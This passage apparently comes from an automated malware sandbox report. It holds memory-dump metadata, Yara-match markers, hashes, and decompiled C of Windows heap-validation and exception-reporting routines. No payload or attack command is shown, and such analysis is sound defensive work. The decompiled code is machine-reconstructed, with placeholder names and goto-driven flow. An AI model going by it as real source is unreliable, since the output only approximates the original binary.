                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                    • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                    • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A6B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                    Download Yara Rule
                    APIs
                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                    • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                    • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0101967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 93c0c2ebfd329cf2e1e44b9e2b62c04be01f57ff422a89f0c0354644e0d8f46b
                    • Instruction ID: 69a11c6c9b46b0977293601f8d75dea4949f5ddf2bf54c090adc8d6635b71c82
                    • Opcode Fuzzy Hash: 93c0c2ebfd329cf2e1e44b9e2b62c04be01f57ff422a89f0c0354644e0d8f46b
                    • Instruction Fuzzy Hash: C0B09B719015D5C5D651D7A446087177A4077D4755F36C451D2420741F477CC491F6B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 0108B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                    Download Yara Rule
                    Strings
                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0108B314
                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0108B2F3
                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0108B305
                    • a NULL pointer, xrefs: 0108B4E0
                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0108B323
                    • This failed because of error %Ix., xrefs: 0108B446
                    • *** Inpage error in %ws:%s, xrefs: 0108B418
                    • The resource is owned exclusively by thread %p, xrefs: 0108B374
                    • *** enter .exr %p for the exception record, xrefs: 0108B4F1
                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0108B53F
                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0108B484
                    • The instruction at %p referenced memory at %p., xrefs: 0108B432
                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0108B476
                    • *** then kb to get the faulting stack, xrefs: 0108B51C
                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0108B47D
                    • *** Resource timeout (%p) in %ws:%s, xrefs: 0108B352
                    • *** enter .cxr %p for the context, xrefs: 0108B50D
                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0108B2DC
                    • an invalid address, %p, xrefs: 0108B4CF
                    • <unknown>, xrefs: 0108B27E, 0108B2D1, 0108B350, 0108B399, 0108B417, 0108B48E
                    • The resource is owned shared by %d threads, xrefs: 0108B37E
                    • Go determine why that thread has not released the critical section., xrefs: 0108B3C5
                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0108B39B
                    • write to, xrefs: 0108B4A6
                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0108B38F
                    • *** An Access Violation occurred in %ws:%s, xrefs: 0108B48F
                    • The instruction at %p tried to %s , xrefs: 0108B4B6
                    • The critical section is owned by thread %p., xrefs: 0108B3B9
                    • read from, xrefs: 0108B4AD, 0108B4B2
                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0108B3D6
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                    • API String ID: 0-108210295
                    • Opcode ID: 3b8d5e0b64b443b129de6262d4565d133c7e92460859c0c9ce05b71224ef1294
                    • Instruction ID: 5b420bb727f9f86c33c0c0e26b75ed2a8ca09bfde6c9f6d75e47d8af0f9ab8f9
                    • Opcode Fuzzy Hash: 3b8d5e0b64b443b129de6262d4565d133c7e92460859c0c9ce05b71224ef1294
                    • Instruction Fuzzy Hash: DE812371A44201FFDB216A089C57EAF3B69FF56BA1F004098F5C42B152D765C511E6B2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01091C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                    Download Yara Rule
                    C-Code - Quality: 44%
                    			E01091C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xfb48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FDB150();
				} else {
					E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x10c589c);
				E00FDB150("Heap error detected at %p (heap handle %p)\n",  *0x10c58a0);
				_t27 =  *0x10c5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01091E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FDB150();
				} else {
					E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00FDB150("Error code: %d - %s\n",  *0x10c5898);
				_t113 =  *0x10c58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FDB150();
					} else {
						E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FDB150("Parameter1: %p\n",  *0x10c58a4);
				}
				_t115 =  *0x10c58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FDB150();
					} else {
						E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FDB150("Parameter2: %p\n",  *0x10c58a8);
				}
				_t117 =  *0x10c58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FDB150();
					} else {
						E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FDB150("Parameter3: %p\n",  *0x10c58ac);
				}
				_t119 =  *0x10c58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FDB150();
					} else {
						E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x10c58b4);
					E00FDB150("Last known valid blocks: before - %p, after - %p\n",  *0x10c58b0);
				} else {
					_t120 =  *0x10c58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FDB150();
				} else {
					E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00FDB150("Stack trace available at %p\n", 0x10c58c0);
			}











                    0x01091c10
                    0x01091c16
                    0x01091c1e
                    0x01091c3d
                    0x01091c3e
                    0x01091c20
                    0x01091c35
                    0x01091c3a
                    0x01091c44
                    0x01091c55
                    0x01091c5a
                    0x01091c65
                    0x01091c67
                    0x00000000
                    0x01091c6e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01091c67
                    0x01091cdc
                    0x01091ce5
                    0x01091d04
                    0x01091d05
                    0x01091ce7
                    0x01091cfc
                    0x01091d01
                    0x01091d0b
                    0x01091d17
                    0x01091d1f
                    0x01091d25
                    0x01091d30
                    0x01091d4f
                    0x01091d50
                    0x01091d32
                    0x01091d47
                    0x01091d4c
                    0x01091d61
                    0x01091d67
                    0x01091d68
                    0x01091d6e
                    0x01091d79
                    0x01091d98
                    0x01091d99
                    0x01091d7b
                    0x01091d90
                    0x01091d95
                    0x01091daa
                    0x01091db0
                    0x01091db1
                    0x01091db7
                    0x01091dc2
                    0x01091de1
                    0x01091de2
                    0x01091dc4
                    0x01091dd9
                    0x01091dde
                    0x01091df3
                    0x01091df9
                    0x01091dfa
                    0x01091e00
                    0x01091e0a
                    0x01091e13
                    0x01091e32
                    0x01091e33
                    0x01091e15
                    0x01091e2a
                    0x01091e2f
                    0x01091e39
                    0x01091e4a
                    0x01091e02
                    0x01091e02
                    0x01091e08
                    0x00000000
                    0x00000000
                    0x01091e08
                    0x01091e5b
                    0x01091e7a
                    0x01091e7b
                    0x01091e5d
                    0x01091e72
                    0x01091e77
                    0x01091e95

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                    • API String ID: 0-2897834094
                    • Opcode ID: 6a6701ed5fba7c46e71202cc9f81b93f5e459e6c51d463eb4d1379f33c59eb8e
                    • Instruction ID: fc6b579d69ea51beb7f462247e2b2c8293cf76db3716d84e433823c731b1414b
                    • Opcode Fuzzy Hash: 6a6701ed5fba7c46e71202cc9f81b93f5e459e6c51d463eb4d1379f33c59eb8e
                    • Instruction Fuzzy Hash: 0861B53A725187DFDB12AB44D966E2573E5E704B31B0E807EF449AB352C63D9840BF0A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01094AEF, Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 59%
                    			E01094AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E00FDB150();
						} else {
							E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E00FDB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00FDB150();
					} else {
						E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E0108FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E00FDB150();
						} else {
							E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E00FDB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E00FDB150();
								} else {
									E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E00FDB150();
									} else {
										E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E00FDB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E0108FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E00FDB150();
										} else {
											E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E0102D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E00FDB150();
								} else {
									E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E0109A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E00FFE12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E0109A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E00FFE4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E00FFA229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E00FFA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E00FFBC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E010823E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E00FD1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                    0x01094af7
                    0x01094afb
                    0x01094afd
                    0x01094b01
                    0x01094b03
                    0x01094b08
                    0x01094b0a
                    0x01094b0f
                    0x01094eb5
                    0x01094eb5
                    0x01094ebb
                    0x010950d5
                    0x010950d8
                    0x01094ff6
